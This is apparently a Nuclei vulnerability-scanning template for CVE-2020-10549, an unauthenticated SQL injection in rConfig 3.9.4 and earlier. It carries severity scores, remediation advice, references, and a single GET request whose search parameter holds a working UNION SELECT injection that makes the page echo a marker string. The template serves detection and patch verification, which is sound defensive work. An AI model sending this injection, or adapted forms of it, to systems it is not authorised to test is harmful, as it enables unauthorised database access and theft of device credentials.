45 lines
1.7 KiB
YAML
45 lines
1.7 KiB
YAML
id: CVE-2020-10549
|
|
|
|
info:
|
|
name: rConfig <=3.9.4 - SQL Injection
|
|
author: madrobot
|
|
severity: critical
|
|
description: rConfig 3.9.4 and prior has unauthenticated snippets.inc.php SQL injection. Because nodes' passwords are stored in cleartext by default, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.
|
|
remediation: |
|
|
Upgrade rConfig to version >3.9.4 or apply the provided patch to mitigate the SQL Injection vulnerability.
|
|
reference:
|
|
- https://github.com/theguly/exploits/blob/master/CVE-2020-10549.py
|
|
- https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-10549
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2020-10549
|
|
cwe-id: CWE-89
|
|
epss-score: 0.45053
|
|
epss-percentile: 0.97045
|
|
cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: rconfig
|
|
product: rconfig
|
|
tags: cve,cve2020,rconfig,sqli
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/snippets.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "[project-discovery]"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4a0a0047304502206a8399bc2c76ab981537369228fe6e3cd31bd66a27adf57916e89acdeb153c6d02210095de118fcc54802b0ded6bc053995b91d6c4c279f93636e1e2997b1c2694a3ac:922c64590222798bb761d5b6d8e72950
|